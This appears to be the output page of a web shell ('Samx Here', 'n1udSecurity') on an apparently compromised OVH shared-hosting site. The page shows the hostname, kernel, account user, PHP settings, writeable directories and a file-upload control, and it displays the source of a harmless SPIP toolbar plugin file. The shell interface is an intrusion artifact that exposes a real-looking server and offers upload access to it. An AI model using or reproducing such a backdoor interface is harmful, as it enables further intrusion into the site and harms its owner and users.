Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/jobs/plugins-dist/porte_plume/barre_outils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/jobs/plugins-dist/porte_plume/barre_outils/vide.php
<?php

/**
 * Déclaration de la barre d'outil vide de SPIP
 *
 * @plugin Porte Plume pour SPIP
 * @license GPL
 * @package SPIP\PortePlume\BarreOutils
 */

if (!defined('_ECRIRE_INC_VERSION')) {
	return;
}


/**
 * Définition de la barre 'vide' pour markitup
 *
 * @return Barre_outils La barre d'outil
 */

function barre_outils_vide() {
	$set = new Barre_outils([
		'nameSpace' => 'vide',
		'markupSet' => [],
	]);
	$set->cacherTout();
	return $set;
}

SAMX